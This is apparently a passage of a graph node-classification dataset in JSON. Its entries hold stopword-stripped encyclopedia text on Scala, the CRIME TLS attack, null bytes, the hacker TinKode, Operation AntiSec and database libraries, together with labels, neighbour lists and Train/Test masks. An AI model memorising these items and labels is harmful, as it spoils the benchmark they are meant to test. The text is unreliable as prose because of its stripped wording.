algebraic data types used many functional programming languages perspective scala case class simply normal class compiler automatically adds certain behaviors could also provided manually e.g. definitions methods providing deep comparisons hashing destructuring case class constructor parameters pattern matching example definition quicksort algorithm using pattern matching idea partition list elements less pivot elements less recursively sort part paste results together pivot uses divide-and-conquer strategy mergesort fast sorting algorithms codice_117 operator used pattern matching object stored codice_118 codice_119 expression tried turn see match first match determines result case codice_120 matches literal object codice_120 codice_122 matches non-empty list simultaneously destructures list according pattern given case associated code access local variable named codice_123 holding head list another variable codice_124 holding tail list note variables read-only semantically similar variable bindings established using codice_125 operator lisp scheme pattern matching also happens local variable declarations case return value call codice_126 tuple — case two lists tuples differ types containers e.g lists always fixed size elements differing types — although pattern matching easiest way fetching two parts tuple form codice_127 declaration anonymous function placeholder variable see section anonymous functions list operators codice_128 adds element onto beginning list similar codice_129 lisp scheme codice_130 appends two lists together similar codice_131 lisp scheme appear despite appearances nothing built-in either operators specified string symbols serve function name method applied object written infix -style without period parentheses line written could also written thus standard method-call notation methods end colon right-associative bind object right pattern-matching example body codice_117 operator partial function consists series codice_119 expressions first matching expression prevailing similar body switch statement partial functions also used exception-handling portion codice_136 statement finally partial function used alone result calling equivalent codice_117 example prior code quicksort written thus read-only variable declared whose type function lists integers lists integers bind partial function note single parameter partial function never explicitly declared named however still call variable exactly normal function scala pure object-oriented language sense every value object data types behaviors objects described classes traits class abstractions extended subclassing flexible mixin-based composition mechanism avoid problems multiple inheritance traits scala replacement java interfaces interfaces java versions 8 highly restricted able contain abstract function declarations led criticism providing convenience methods interfaces awkward methods must reimplemented every implementation extending published interface backwards-compatible way impossible traits similar mixin classes nearly power regular abstract class lacking class parameters scala equivalent java constructor parameters since traits always mixed class codice_138 operator behaves specially traits allowing traits chained using composition addition inheritance following example simple window system variable may declared thus result calling codice_139 words call codice_140 first executed code codice_141 last trait mixed codice_142 calls threaded back mixed-in traits eventually code codice_143 even though none traits inherited one another similar decorator pattern concise less error-prone n't require explicitly encapsulating parent window explicitly forwarding functions whose implementation n't changed relying run-time initialization entity relationships languages similar effect could achieved compile-time long linear chain implementation inheritance disadvantage compared scala one linear inheritance chain would declared possible combination mix-ins scala equipped expressive static type system mostly enforces safe coherent use abstractions type system however sound particular type system supports scala able infer types usage makes static type declarations optional static types need explicitly declared unless compiler error indicates need practice static type declarations included sake code clarity common technique scala known enrich library originally termed pimp library martin odersky 2006 though concerns raised phrasing due negative connotation immaturity allows new methods used added existing types similar c concept extension methods powerful technique limited adding methods instance used implement new interfaces scala technique involves declaring implicit conversion type receiving method new type typically class wraps original type provides additional method method found given type compiler automatically searches applicable implicit conversions types provide method question technique allows new methods added existing class using add-on library code imports add-on library gets new functionality code unaffected following example shows enrichment type codice_73 methods codice_145 codice_146 importing members codice_147 brings implicit conversion extension class codice_148 scope scala standard library includes support actor model addition standard java concurrency apis lightbend inc. provides platform includes akka separate open-source framework provides actor-based concurrency akka actors may distributed combined software transactional memory transactors alternative communicating sequential processes csp implementations channel-based message passing communicating scala objects simply via jcsp actor like thread instance mailbox created codice_149 overriding codice_150 method receive messages using codice_151 exclamation point method send message following example shows echoserver receive messages print scala also comes built-in support data-parallel programming form parallel collections integrated standard library since version 2.9.0 following example shows use parallel collections improve performance besides actor support data-parallelism scala also supports asynchronous programming futures promises software transactional memory event streams well-known open-source cluster-computing solution written scala apache spark additionally apache kafka publish–subscribe message queue popular spark stream processing technologies written scala several ways test code scala scalatest supports multiple testing styles integrate java-based testing frameworks scalacheck library similar haskell quickcheck specs2 library writing executable software specifications scalamock provides support testing high-order curried functions junit testng popular testing frameworks written java scala often compared groovy clojure two programming languages also using jvm substantial differences languages found type system extent language supports object-oriented functional programming similarity syntax syntax java scala statically typed groovy clojure dynamically typed makes type system complex difficult understand allows almost type errors caught compile-time result significantly faster execution contrast dynamic typing requires testing ensure program correctness generally slower order allow greater programming flexibility simplicity regarding speed differences current versions groovy clojure allow optional type annotations help programs avoid overhead dynamic typing cases types practically static overhead reduced using recent versions jvm enhanced invoke dynamic instruction methods defined dynamically typed arguments advances reduce speed gap static dynamic typing although statically typed language like scala still preferred choice execution efficiency important regarding programming paradigms scala inherits object-oriented model java extends various ways groovy also strongly object-oriented focused reducing verbosity clojure object-oriented programming deemphasised functional programming main strength language scala also many functional programming facilities including features found advanced functional languages like haskell tries agnostic two paradigms letting developer choose two paradigms frequently combination thereof regarding syntax similarity java scala inherits much java syntax case groovy clojure hand follows lisp syntax different appearance philosophy however learning scala also considered difficult many advanced features case groovy despite also feature-rich language mainly designed mainly scripting language jvm-based languages clojure groovy kotlin scala significantly less popular original java language usually ranked first second also simultaneously evolving time popularity programming language index tracks searches language tutorials ranked scala 15th april 2018 small downward trend makes scala popular jvm-based language java although immediately followed kotlin jvm-based language strong upward trend ranked 16th tiobe index programming language popularity employs internet search engine rankings similar publication-counting determine language popularity april 2018 shows scala 34th place dropped four places last two years but–as mentioned bugs change requests –tiobe aware issues methodology using search terms might commonly used programming language communities ranking scala ahead functional languages like haskell 42nd erlang languages like swift 15th perl 16th go 19th clojure 30th thoughtworks technology radar opinion based biannual report group senior technologists recommended scala adoption languages frameworks category 2013 july 2014 assessment made specific refers scala good parts described successfully use scala need research language strong opinion parts right creating definition scala good parts. redmonk programming language rankings establishes rankings based number github projects questions asked stack overflow ranks scala 14th scala placed inside second-tier group languages–ahead go powershell haskell behind swift objective-c typescript r. however 2018 report rankings noted drop scala rank third time row questioning much available oxygen scala consumed kotlin latter continues rocket rankings 2018 edition state java survey collected data 5160 developers various java-related topics scala places third terms usage alternative languages jvm compared last year edition survey scala usage among alternative jvm languages fell almost quarter 28.4 21.5 overtaken kotlin rose 11.4 2017 28.8 2018 march 2015 former vp platform engineering group twitter raffi krikorian stated would chosen scala 2011 due learning curve month linkedin svp kevin scott stated decision minimize dependence scala november 2011 yammer moved away scala reasons included learning curve new team members incompatibility one version scala compiler next",
    "neighbors": [
      3076,
      4101,
      7176,
      6153,
      9224,
      9225,
      2062,
      2576,
      6160,
      6161,
      2069,
      1047,
      2585,
      1051,
      9245,
      8739,
      5677,
      2045,
      2612,
      8251,
      572,
      6718,
      10819,
      7750,
      8262,
      595,
      84,
      6228,
      3159,
      2658,
      9828,
      102,
      10854,
      1130,
      8810,
      9330,
      8825,
      7292,
      3712,
      9345,
      2181,
      5255,
      1673,
      10377,
      7315,
      148,
      9875,
      10387,
      5783,
      3736,
      155,
      7326,
      4777,
      9385,
      1203,
      692,
      7347,
      8883,
      4791,
      9914,
      190,
      8385,
      9926,
      5833,
      6860,
      7889,
      7386,
      1250,
      228,
      10470,
      2795,
      10991,
      5872,
      4341,
      2304,
      11009,
      4358,
      5383,
      6411,
      8973,
      11026,
      5395,
      1812,
      1301,
      1813,
      6933,
      10011,
      5917,
      6941,
      8479,
      8990,
      10526,
      3876,
      11559,
      10537,
      8495,
      7987,
      9011,
      11574,
      7485,
      5952,
      1353,
      5961,
      10059,
      8524,
      10571,
      847,
      3920,
      1363,
      2903,
      10584,
      10586,
      6493,
      4960,
      11617,
      5987,
      10083,
      8549,
      1382,
      6502,
      8554,
      9078,
      3960,
      8057,
      3966,
      1920,
      6016,
      3462,
      8582,
      6536,
      1931,
      910,
      9614,
      5008,
      5521,
      8082,
      10649,
      11161,
      1435,
      9631,
      1952,
      8609,
      10145,
      7076,
      5029,
      1959,
      5031,
      11688,
      428,
      4529,
      6067,
      8116,
      6074,
      10683,
      10684,
      3519,
      5567,
      9665,
      9666,
      963,
      8644,
      8139,
      11212,
      10193,
      11219,
      5588,
      11221,
      2519,
      4056,
      9179,
      477,
      479,
      4578,
      4069,
      9701,
      3560,
      3561,
      3562,
      7146,
      7147,
      7148,
      10222,
      8691,
      3573,
      1016,
      1018,
      11259,
      2556,
      2557,
      6143
    ],
    "mask": "Test"
  },
  {
    "node_id": 3706,
    "label": 7,
    "text": "Westcoast_Limited:westcoast limited westcoast limited also known westcoast group provides products services including storage systems servers workstations provides goods services business business education sector established 1984 westcoast group remains privately held distributor arm westcoast limited distributing leading brands hp hpe microsoft lenovo apple many others broad range resellers retailers office product dealers uk beyond westcoast limited grown become number one uk distributor many vendors customers westcoast group employs 1,600 people across number locations uk ireland europe westcoast limited largest privately owned company thames valley company founded 1984 reading united kingdom orion media marketing printer consumables distributor acquired 2005 2006 company bought irish distributors clarity westcoast merged xma printer consumables distributor 2008 however operations consolidated xma continued distinct brand entity xma also distribution centre milton keynes xma operation merged viglen 2014 westcoast bought nottingham uk based artsystems 2016 company supply 3d printing equipment 2017 xma turnover £350m westcoast distributes uk ireland centres reading nottingham milton keynes europe data centre wales",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 3707,
    "label": 4,
    "text": "CRIME:crime crime compression ratio info-leak made easy security exploit secret web cookies connections using https spdy protocols also use data compression used recover content secret authentication cookies allows attacker perform session hijacking authenticated web session allowing launching attacks crime assigned cve-2012-4929 vulnerability exploited combination chosen plaintext attack inadvertent information leakage data compression similar described 2002 cryptographer john kelsey relies attacker able observe size ciphertext sent browser time inducing browser make multiple carefully crafted web connections target site attacker observes change size compressed request payload contains secret cookie sent browser target site variable content created attacker variable content altered size compressed content reduced inferred probable part injected content matches part source includes secret content attacker desires discover divide conquer techniques used home true secret content relatively small number probe attempts small multiple number secret bytes recovered crime exploit hypothesized adam langley first demonstrated security researchers juliano rizzo thai duong also created beast exploit exploit due revealed full 2012 ekoparty security conference rizzo duong presented crime general attack works effectively large number protocols including limited spdy always compresses request headers tls may compress records http may compress responses crime defeated preventing use compression either client end browser disabling compression spdy requests website preventing use data compression transactions using protocol negotiation features tls protocol detailed transport layer security tls protocol version 1.2 client sends list compression algorithms clienthello message server picks one sends back serverhello message server choose compression method client offered client offers 'none compression data compressed similarly since 'no compression must allowed tls clients server always refuse use compression crime exploit spdy tls-level compression described mitigated then-latest versions chrome firefox web browsers websites applied countermeasures end nginx web-server vulnerable crime since 1.0.9/1.1.6 october/november 2011 using openssl 1.0.0+ since 1.2.2/1.3.2 june july 2012 using versions openssl note december 2013 crime exploit http compression mitigated rizzo duong warned vulnerability might even widespread spdy tls compression combined august 2013 black hat conference researchers gluck harris prado announced variant crime exploit http compression called breach short browser reconnaissance exfiltration via adaptive compression hypertext uncovers https secrets attacking inbuilt http data compression used webservers reduce network traffic",
    "neighbors": [
      513,
      9987,
      517,
      1157,
      1288,
      9744,
      1683,
      1688,
      7965,
      3742,
      2083,
      3237,
      2470,
      8358,
      3629,
      11693,
      11569,
      9394,
      5427,
      7736,
      64,
      9281,
      9412,
      3657,
      5834,
      10831,
      11345,
      5078,
      87,
      5590,
      474,
      3805,
      7264,
      8674,
      2275,
      7139,
      10341,
      11119,
      5107,
      501,
      1526,
      2169,
      510,
      4863
    ],
    "mask": "Test"
  },
  {
    "node_id": 3708,
    "label": 4,
    "text": "Null_character:null character null character also null terminator null byte control character value zero present many character sets including iso/iec 646 ascii c0 control code universal coded character set unicode ebcdic available nearly mainstream programming languages often abbreviated nul null though contexts term used null pointer different object original meaning character like nop—when sent printer terminal nothing terminals however incorrectly display space electromechanical teleprinters used computer output devices one null characters sent end printed line allow time mechanism return first printing position next line punched tape character represented holes new unpunched tape initially filled null characters often text could inserted reserved space null characters punching new characters tape nulls today character much significance c derivatives many data formats serves reserved character used signify end string often called null-terminated string allows string length overhead one byte alternative storing count requires either string length limit 255 overhead one byte advantages/disadvantages described null-terminated string null character often represented escape sequence codice_1 source code string literals character constants many languages c introduced notation separate escape sequence octal escape sequence single octal digit 0 consequence codice_1 must followed digits codice_3 codice_4 otherwise interpreted start longer octal escape sequence escape sequences found use various languages codice_5 codice_6 codice_7 codice_8 null character placed url percent code codice_9 ability represent null character always mean resulting string correctly interpreted many programs consider null end string thus ability type case unchecked user input creates vulnerability known null byte injection lead security exploits caret notation null character codice_10 keyboards one enter null character holding pressing us layouts often work need get sign documentation null character sometimes represented single-em-width symbol containing letters nul unicode character corresponding glyph visual representation null character symbol null u+2400 ␀ —not confused actual null character u+0000 modern character sets null character code point value zero encodings translated single code unit zero value instance utf-8 single zero byte however modified utf-8 null character encoded two bytes 0xc0 0x80 allows byte value zero used character used string terminator",
    "neighbors": [
      2945,
      5636,
      2313,
      1803,
      6669,
      3983,
      11151,
      2193,
      2194,
      7188,
      2197,
      2199,
      2974,
      10786,
      7717,
      5293,
      1841,
      701,
      8262,
      10959,
      4057,
      4063,
      479,
      6497,
      6754,
      7269,
      3563,
      3443,
      246,
      3834,
      2045,
      9854
    ],
    "mask": "Test"
  },
  {
    "node_id": 3709,
    "label": 4,
    "text": "TinKode:tinkode răzvan manole cernăianu born 7 february 1992 nicknamed tinkode romanian computer security consultant hacker known gaining unauthorized access computer systems many different organizations posting proof exploits online commonly hacks high profile websites sql injection vulnerabilities although unknown methods used recent attacks aliases included sysgh0st tinkode romanian claims born 1992 southern part country states hacking skills result extreme curiosity ambition targets well known websites powerful brands widespread influence either online community particular marketplace attacks often involve numeral seven tinkode fan social networks owning twitter account facebook account well many blogs royal navy website temporarily unavailable tinkode claimed hacked also breached security servers nasa posting screenshots ftp server within nasa earth observation system goddard space flight center claims gained access computers belonging european space agency also claims found vulnerabilities organizations including sun microsystems mysql kaspersky portugal us army youtube google websites tinkode never publicly criticized security experts mainly n't disclose full information regarding breached websites actually informed webmasters posting results online giving time fix vulnerability tinkode also received google security reward tuesday january 31 2012 tinkode placed arrest romanian authority diicot anti organised crime terrorism institution charge temporarily blocked information systems us army pentagon nasa association casi tinkode officially released april 27 2012 following arrest petition generated raise support tinkode wednesday february 8 2012 petition aimed diicot fbi give tinkode reasonable fair sentence claiming hacker n't malicious hacking curiosity released 3 months",
    "neighbors": [
      9665,
      899,
      7022,
      4956,
      2558
    ],
    "mask": "Train"
  },
  {
    "node_id": 3710,
    "label": 1,
    "text": "EclipseLink:eclipselink eclipselink open source eclipse persistence services project eclipse foundation software provides extensible framework allows java developers interact various data services including databases web services object xml mapping oxm enterprise information systems eis eclipselink supports number persistence standards including eclipselink based toplink product oracle contributed source code create eclipselink project original contribution toplink 11g code base entire code-base/feature set contributed ejb 2 container-managed persistence cmp minor oracle application server specific integration removed differs toplink essentials glassfish contribution include key enterprise features package names changed code configuration moved around toplink mapping workbench user interface also contributed project eclipselink intended path forward persistence oracle toplink intended next major release oracle toplink include eclipselink well next major release oracle application server eclipselink supports usage osgi environment sun microsystems selected eclipselink project reference implementation jpa 2.0. oracle jpa 2.1",
    "neighbors": [
      3712,
      9988,
      3080,
      4233,
      16,
      5677,
      7983,
      3763,
      7475,
      7485,
      7742,
      3517,
      6334,
      9665,
      6860,
      10573,
      4944,
      10193,
      5460,
      3545,
      4960,
      7777,
      5987,
      5612,
      9467
    ],
    "mask": "Test"
  },
  {
    "node_id": 3711,
    "label": 4,
    "text": "Operation_AntiSec:operation antisec operation anti-security also referred operation antisec antisec series hacking attacks performed members hacking group lulzsec group anonymous others inspired announcement operation lulzsec performed earliest attacks operation first serious organised crime agency 20 june 2011 soon group released information taken servers arizona department public safety anonymous would later release information agency two times offshoot group calling lulzsecbrazil launched attacks numerous websites belonging government brazil energy company petrobras lulzsec claimed retire group 18 july reconvened hack websites british newspapers sun times posting fake news story death publication owner rupert murdoch anonymous released first cache operation 27 june 2011 taken anti-cyberterrorism program run united states department homeland security federal emergency management agency continued attacks arizona government also launched attacks governments brazil zimbabwe tunisia recent attacks large corporations nato various united states law enforcement websites anonymous used stolen credit card numbers police officers make unauthorized donations various causes others also committed hacks name operation including hack fox news twitter account post false news story assassination president united states barack obama attacks websites government entities various countries groups involved published sensitive government corporate information well email addresses names social security numbers credit card numbers website users law enforcement launched investigations many attacks committed part operation antisec least seven arrests made connection activities related operation including arrests two purported lulzsec members man provided lulzsec security vulnerability information four alleged members antisec nl group inspired operation lulzsec hacking group formed may 2011 came international prominence hacking websites public broadcasting service sony united states senate initially group claimed hack lulz enjoy chaos follows intrusions however 20 june 2011 group announced teaming hacking collective anonymous series attacks dubbed operation anti-security operation antisec press release accompanying beginning operation called supporters steal publish classified government documents name antisec major banks corporations also mentioned potential targets though lulzsec disbanded group 26 june 2011 members reported continuing operation within anonymous groups involved claim operation aims protest government censorship monitoring internet lulzsec members also mention ending believe corrupt racial profiling copyright laws goal operation war drugs also given reason particular hacks contrast usa today described operation cyberwarfare targeting governments large corporations lulzsec launched first attacks operation serious organised crime agency national law enforcement agency united kingdom handles cybercrime group launched distributed denial-of-service attack agency website 20 june taking offline minutes day knocked website jianhua district qiqihar china offline 23 june group released large cache documents taken servers arizona department public safety release titled chinga la migra roughly translating fuck border patrol including email addresses passwords hundreds documents marked sensitive official use group claimed retaliation passage arizona sb 1070 law saw leading unjust racial profiling arizona complained release officer identities personal information families could put families danger gave exposed security protection response mobilized arizona counter terrorism information center locked remote access department public safety email accounts 25 june 2011 group released described last dump operation release contained large amount information varied sources included information numerous companies including half gigabyte data telecommunications company ip addresses sony viacom disney emi nbc universal portion included information pertaining release 4g lte 90,000 personal phones used ibm development ipad 3 also contained 750,000 usernames password combinations including 200,000 hackforums.net 12,000 nato online bookstore 500,000 online video game battlefield heroes 50,000 various video game forums 29 irish private investigation company priority investigations finally internal manual aol engineers screencapture united states navy website navy.mil vandalized 22 june offshoot group calling lulzsecbrazil took website government brazil brasil.gov.br president brazil presidencia.gov.br also targeted website brazilian energy company petrobras 24 june claimed publish access codes passwords petrobras website along personnel profiles however company denied information stolen group removed claim twitter feed hours later group also published personal information president brazil dilma rousseff mayor são paulo gilberto kassab despite claiming retired 18 july lulzsec hacked website british newspaper sun group redirected newspaper website also-hacked redesign website another newspaper times altering site resemble sun posting fake story claiming rupert murdoch died ingesting fatal dose palladium objected involvement news corporation murdoch-owned company publishes sun times large phone hacking scandal hacked website also contained webcomic depicting lulzsec deciding carrying attack group later redirected sun website twitter feed news international released statement regarding attacks page statement appeared also redirected lulzsec twitter page eventually taken offline group also released names phone numbers reporter sun two others associated newspaper encouraged supporters call group included old email address password former news international executive rebekah brooks news corporation took websites offline precaution later day 27 june 2011 anonymous published information relating cyberterrorism defense initiative security network training initiative national education laboratory program sentinel program operation run united states department homeland security federal emergency management agency hack included information agency distributed 2009 contained resources publicly available hacking software list federal bureau investigation bureau locations details counter-hacking tools form letters law enforcement agencies used obtain user details internet service providers 28 june group released second collection documents stolen arizona department public safety operation anti-security dubbed chinga la migra communique dos fuck border patrol message two data file contained names addresses phone numbers internet passwords social security numbers dozen arizona police officers also contained emails voicemails chat logs least one instance included sexually explicit photographs one officer girlfriends anonymous also claimed documents included officers forwarding racist chain emails evidence k-9 unit officers using percocet fraternal order police member also convicted sex offender anonymous noted motivation stemmed desire make police officers experience taste kind violence terror dish every day basis day group released information obtained various government sources government data anguilla passwords servers belonging government brazil users zimbabwe government websites data municipality mosman council included mosman council dump included mainly publicly available information website well not-publicly-available prototype version website yet launched claimed also access zimbabwean government websites ending gov.zw information control given sql injection anonymous claimed targeted brazil saw data manipulation zimbabwe controversial 2008 zimbabwean presidential election also gained control website belonging government tunisia replaced webpage graphic representing anonymous text reading internet last frontier let corrupt governments spoil anonymous lulzsec people around world stepping name freedom release also included file containing internal mapping viacom servers well passwords data umusic.com website universal music group also released names 2,800 members black eagles paramilitary group 1 july anonymous targeted arizona law enforcement publishing number backdoors could used access arizona police servers pastebin arizona forced pull many websites offline time websites affected included department public safety mariposa chapter fraternal order police also claimed found anti-muslim emails attack 3 july anonymous hacked database democratic party orange county florida published partial membership list handbook precinct committee members hack also considered part group oporlando plan 4 july anonymous released document containing 27 administrative usernames passwords apple inc. system used operate online technical support follow-up surveys encrypted passwords taken sql database anonymous launched dubbed turkish takedown thursday 6 july posted internal data one hundred .tr websites brought replaced content 74 74 sites normal pages replaced antisec logo message denouncing supposed attempts internet censorship turkish government websites affected included children hospital key government agencies day group released database dumps taken 20 universities italy two days later italian police arrested 15 alleged members anonymous ranging age 15 28 group vowed revenge raids 8 july group claimed responsibility hacks irc federal engineering firm contracts federal bureau investigation agencies united states federal government internal database documents personnel email stolen attack group also claimed vandalized firm website forcing take offline group says documents procured found proposal fbi firm produce special identities modernization sim project would help identify might present criminal terrorist risk future fingerprinting contracts united states department justice biometrics contracts military also claimed obtained information allowing log various virtual private networks access panels belonging united states department energy also sent message company employees urging work government rather hack done simple sql injection 11 july anonymous hacked systems belonging defense contractor booz allen hamilton breaking barriers group described security measures place released said 90,000 email accounts encrypted passwords united states central command united states special operations command united states marine corps united states air force united states department homeland security united states department state various private sector contractors calling released military meltdown monday also sarcastically posted invoice charging company security audit services rendered despite anonymous claims 90,000 emails released associated press counted 67,000 unique emails 53,000 military addresses remainder addresses came educational institutions defense contractors department defense said aware incident coordinating agencies response booz allen confirmed intrusion 13 july contradicted anonymous claims saying attack never got past systems meaning information military secure 12 july group attacked web servers agricultural biotechnology company monsanto released information company employees including names addresses email addresses group claimed performed attack protest company lawsuits farmers manufacture organic milk effort stop stating label milk contain artificial bovine growth hormones monsanto confirmed attack claimed ten percent information published came current former employees company said ninety percent email addresses names media contacts employees agricultural companies 21 july anonymous released two pdfs purportedly taken servers belonging nato claimed via twitter obtained around one gigabyte data would release portions course days group claimed data sensitive felt would irresponsible release thus would make portion taken available first two documents released relate outsourcing communication information services cis kosovo funding request project austrian branch anonymous hacked website austrian gebühren info service television license agency run austrian national public service broadcaster 22 july accessed 214,000 records containing personal information stole banking data 96,000 people server counter-terrorism bureau country launched investigation preparing file criminal complaints involved 25 july first posted confidential information claimed came italian centro nazionale anticrimine informatico per la protezione delle infrastrutture critiche translated national anti-crime computer center critical infrastructure protection agency tasked protecting vital computer systems country twitter account anonesc posted less 100 megabytes data claimed taken eight gigabytes data related oil nuclear firms deemed involved critical infrastructure well government agencies including department defence australia 29 july anonymous hacked fbi-contractor mantech international posted pdf résumé sent company proof infiltrated systems anonymous claimed attack would first part promised fuck fbi friday fff campaign part larger operation antisec published 400 megabytes content company later day internal documents generally concern contracts mantech nato nature anonymous claims shows waste taxpayer money files also include dealings united states army list employee emails 31 july anonymous attacked websites 77 different law enforcement websites hosted server much 10 gigabytes data taken including personal information police officers numerous jurisdictions emails also taken well confidential information inmates confidential informants though released yet anonymous said would redact inmate names would release names informants false impression would able ‘ anonymously ’ snitch secrecy release also included demand arrested members anonymous released immediately information released however already publicly available proceeded release social security numbers 100 police officers missouri sheriffs association website following saturday 6 august released cache data websites title shooting sheriffs saturday release included information taken law enforcement websites large amounts personal information included anonymous stating sympathy officers informants may endangered release personal information long using abusing personal information anonymous claimed motive revenge arrests number participants previous operations lulzsec anonymous member topiary also used stolen credit card numbers make donations american civil liberties union electronic frontier foundation chelsea manning support network 16 august anonymous gained access email account richard garcia former assistant director charge fbi field office los angeles senior vice president vanguard defense industries name antisec claimed firm relationships united states military law enforcement organizations made legitimate target part operation also claimed breached company website run wordpress platform though company says website never affected group released 1 gigabyte information three days later taken garcia personal email account mainly related garcia former role infragard retaliation arrests people allegedly participated operation antisec especially topiary anonymous attacked website texas police chiefs association 1 september group defaced website released documents marked law enforcement sensitive official use release also included police officer private email day group brought website united states court appeals ninth circuit justice system characterization anonymous activities cyber-terrorism 21 october announced dump data related law enforcement support occupy wall street occupy movement dump including data taken international association chiefs police boston police patrolmen association sheriff office baldwin county alabama number police websites virtually hosted together also content replaced anti-police rap video dump 600 megabytes information including membership rosters internal documents social security numbers international association chiefs police nearly 1000 names ranks addresses phone numbers social security numbers police officers jefferson county alabama birmingham alabama 1000 names passwords members boston police patrolmen association financial information client list web developer marketing company matrix group business several law enforcement clients antisec claimed least 40 law enforcement related websites included attack november 18 2011 anonymous posted 38,000 email messages gmail account alfredo fred baclagan special agent supervising computer crime investigations california department justice computer technology crime hightech response team site tor pirate bay also added claimed baclagan personal home address phone number group claimed action part attack law enforcement support occupy movement protest prosecution computer criminals general also claimed read text messages listened voicemail used google voice account call text friends family also purchased camera using google wallet release includes forensic experts discussing techniques tracking cybercriminals different companies respond law enforcement requests information 4 september 2012 1 million unique device ids apple products published group associated anonymous group claimed 1 million ids part dataset 12.36 million records taken fbi laptop fbi responded saying aware unauthorized data release according ars technica article published september 10 digital publishing company named bluetoad come forward take responsibility leak million ios unique device identifiers udids previously attributed alleged fbi laptop hack number interviews published monday bluetoad apologized public incident explaining hackers broken company systems order steal file original announcement operation anti-security included call lulzsec spread name antisec physical graffiti days number locations mission beach san diego vandalized pieces graffiti reading phrase 4 july fox news twitter account foxnewspolitics hacked false tweets reporting president united states barack obama shot three times killed sent account script kiddies group close ties anonymous including two hackers former membership group claimed responsibility attack hoax group claimed action name operation anti-security would continue looking expose information corporations assist antisec united states secret service investigating incident threat president group subsequently hacked facebook page pharmaceutical company pfizer claiming moral reasons part antisec posted numerous messages company facebook wall mocking security 4 july someone going name f1esc posted file pirate bay containing 600 megabytes information described national au election data labelled tag antisec reality data concerned 2011 new south wales state election taken government website designed provide election results data publicly available data proved freely accessible information instead hack early july group redhack hacked defaced 1000 websites based turkey claimed mark anniversary sivas massacre part operation anti-security websites belonged agencies government turkey adnan oktar islamic creationist group vowed continue contribution antisec operation 6 july hacker called p0keu released around 2,658 usernames passwords hidden behind hash functions email addresses blog tamilcanadian.com gave reason chose website attack antisec label 14 july leaked part stevens institute technology website database least 31 records database contained plain text files email addresses user names passwords site users p0keu posted user information pastebin p0keu continued hacking labelled releases antisec slogan netherlands splinter group inspired lulzsec formed calling antisec nl group hacked websites online dating service pepper.nl software company nimbuzz four people believed police members later arrested 24 july group called bashcrew hacked website house representatives philippines name antisec names telephone numbers email addresses members filipino congress released via pastebin group claiming may also release blood types private websites members hacker going name thehacker12 self-purported antisec supporter member anonymous released data stolen event management company allianceforbiz.com 24 august 2011 mediafire pastebin release contained spreadsheet usernames email addresses passwords employers information around 20,000 people many united states government employees contractors organization employees compromised small business administration law enforcement agencies various countries arrested searched property alleged participants operation antisec suspects come different groups carried attacks part operation 19 july 2011 london metropolitan police announced arrest possible core lulzsec member t-flow 16-year-old male arrested south london charges violating computer misuse act part operation involving arrest several hackers affiliated anonymous united states united kingdom day fbi arrested 21-year-old lance moore las cruces new mexico accused stealing thousands documents applications lulzsec published part so-called final release operation lulzsec denied membership arrested stating six us 're still 20 july prosecutors netherlands released details arrests four suspects aged 17 18 25 35 located different dutch cities accused part hacking group antisec nl operation participant inspired lulzsec four going online handles ziaolin calimero dutchd3v1l time arrested 19 july computers electronic equipment confiscated evidence prosecutors identified suspects computer security company fox-it helped gain access chat channel thought used group police central e-crime unit arrested 18-year-old man shetland 27 july 2011 suspected lulzsec member topiary also searched house interviewed 17-year-old lincolnshire possibly connected investigation scotland yard later identified man arrested yell shetland resident jake davis charged unauthorized access computer computer misuse act 1990 encouraging assisting criminal activity serious crime act 2007 conspiracy launch denial-of-service attack serious organised crime unit contrary criminal law act 1977 criminal conspiracy also criminal law act 1977 police confiscated dell laptop 100-gigabyte hard drive ran 16 different virtual machines details relating attack sony hundreds thousands email addresses passwords found computer london court released davis bail conditions live curfew parents access internet lawyer gideon cammerman stated client help publicize lulzsec anonymous attacks lacks technical skills anything sympathizer early september 2011 scotland yard made two arrests relating lulzsec police arrested 24-year-old male mexborough south yorkshire 20-year-old male warminster wiltshire two accused conspiring commit offenses computer misuse act 1990 police said arrests related investigations lulzsec member kayla 6 march 2012 two men great britain one united states two ireland charged connection alleged involvement lulzsec fbi revealed supposed lulzsec leader hector xavier monsegur went username sabu aiding law enforcement since pleading guilty twelve counts including conspiracy computer hacking 15 august 2011 part plea deal exchange cooperation federal prosecutors agreed prosecute monsegur computer hacking also prosecute two attempts sell marijuana possession illegal handgun purchasing stolen property charging 15,000 former employer credit card case identity theft directing people buy prescription drugs illegal sources still faces misdemeanor charge impersonating federal agent five suspects charged conspiracy jake davis accused hacker topiary previously arrested ryan ackroyd london accused kayla darren martyn ireland accused pwnsauce donncha ’ cearrbhail ireland accused palladium jeremy hammond chicago accused anarchaos member lulzsec authorities suspect hammond member anonymous charged access device fraud hacking relation supposed involvement december 2011 attack intelligence company stratfor part operation antisec",
    "neighbors": [
      1024,
      5636,
      4117,
      8726,
      535,
      9761,
      4644,
      4133,
      1608,
      3657,
      8779,
      4703,
      8288,
      8292,
      107,
      5749,
      10875,
      8320,
      5764,
      2187,
      4240,
      1688,
      2717,
      9375,
      10413,
      9904,
      9395,
      8886,
      3789,
      4304,
      4314,
      9435,
      4830,
      3807,
      5349,
      1254,
      10477,
      9460,
      7418,
      3323,
      2815,
      3843,
      6916,
      10502,
      10003,
      297,
      2857,
      8489,
      11052,
      9518,
      1337,
      9550,
      4945,
      6484,
      857,
      1882,
      7515,
      4956,
      2409,
      3956,
      1400,
      9082,
      899,
      11152,
      10132,
      1440,
      5024,
      5028,
      11175,
      5547,
      7601,
      1970,
      8627,
      441,
      1979,
      4027,
      9664,
      8133,
      4054,
      7639,
      8664,
      9688,
      10207,
      1504,
      9186,
      488,
      2542,
      507,
      9727
    ],
    "mask": "None"
  },
  {
    "node_id": 3712,
    "label": 1,
    "text": "JOOQ_Object_Oriented_Querying:jooq object oriented querying jooq object oriented querying commonly known jooq light database-mapping software library java implements active record pattern purpose relational object oriented providing domain-specific language construct queries classes generated database schema jooq claims sql come first database integration thus introduce new textual query language rather allows constructing plain sql jooq objects code generated database schema jooq uses jdbc call underlying sql queries provides abstraction top jdbc jooq much functionality complexity standard object-relational mapping libraries eclipselink hibernate jooq closeness sql advantages typical object-relational mapping libraries sql many features used object oriented programming paradigm set differences referred object-relational impedance mismatch close sql jooq helps prevent syntax errors type mapping problems also variable binding taken care also possible jooq create complex queries involve aliasing unions nested selects complex joins jooq also supports database-specific features udts enum types stored procedures native functions nested query selecting aliased table equivalent jooq dsl simply using code generation database metadata generate constants",
    "neighbors": [
      9345,
      8324,
      4358,
      3080,
      910,
      5403,
      10526,
      11552,
      5031,
      5677,
      10413,
      7983,
